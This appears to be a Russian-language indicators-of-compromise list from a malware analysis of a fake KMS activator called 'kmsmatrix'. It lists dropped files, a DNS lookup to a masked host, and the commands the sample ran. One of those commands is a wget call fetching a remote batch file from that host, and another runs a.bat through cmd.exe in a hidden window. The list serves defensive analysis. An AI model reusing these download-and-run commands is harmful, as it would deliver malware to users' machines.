Техническая информация
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\a.bat
- %WINDIR%\s.txt
- %WINDIR%\wget\bin\libeay32.dll
- %WINDIR%\wget\bin\libiconv2.dll
- %WINDIR%\wget\bin\libintl3.dll
- %WINDIR%\wget\bin\libssl32.dll
- %WINDIR%\wget\bin\wget.exe
- %WINDIR%\curl\curl.exe
- %APPDATA%\kmsmatrix\kmsmatrix.exe
- %WINDIR%\kmsauto net.exe
- %WINDIR%\kmsauto.ini
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- DNS ASK 88##.space
- '%APPDATA%\kmsmatrix\kmsmatrix.exe'
- '%WINDIR%\wget\bin\wget.exe' -c -P "%WINDIR%" "http://88##.space/rs/st/b.bat" --referer="alpha" --user-agent="kmsmatrix"
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\a.bat" "
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" ver "
- '%WINDIR%\syswow64\findstr.exe' /IL "5.1."